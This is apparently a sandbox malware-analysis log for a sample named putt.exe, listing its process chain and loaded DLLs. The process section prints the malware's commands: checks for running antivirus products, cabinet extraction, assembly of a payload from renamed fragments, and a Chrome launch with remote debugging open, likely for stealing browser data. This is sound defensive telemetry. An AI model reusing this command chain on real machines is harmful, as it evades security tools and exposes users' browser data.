Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cohen Cohen.cmd & Cohen.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 105235
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Authorization
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "aid" Division
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 105235\Inf.com + Proceedings + Recovery + Webster + Sunglasses + Cultural + Tulsa + Being + Name + Silicon + Subtle 105235\Inf.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Glad + ..\Norway + ..\Tired m
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Inf.com m
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2204,i,11129156234363170229,15711613053576599617,262144 /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\putt.exe "C:\Users\user\AppData\Local\Temp\putt.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cohen Cohen.cmd & Cohen.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 105235	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Authorization	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "aid" Division	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 105235\Inf.com + Proceedings + Recovery + Webster + Sunglasses + Cultural + Tulsa + Being + Name + Silicon + Subtle 105235\Inf.com	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Glad + ..\Norway + ..\Tired m	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Inf.com m	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2204,i,11129156234363170229,15711613053576599617,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
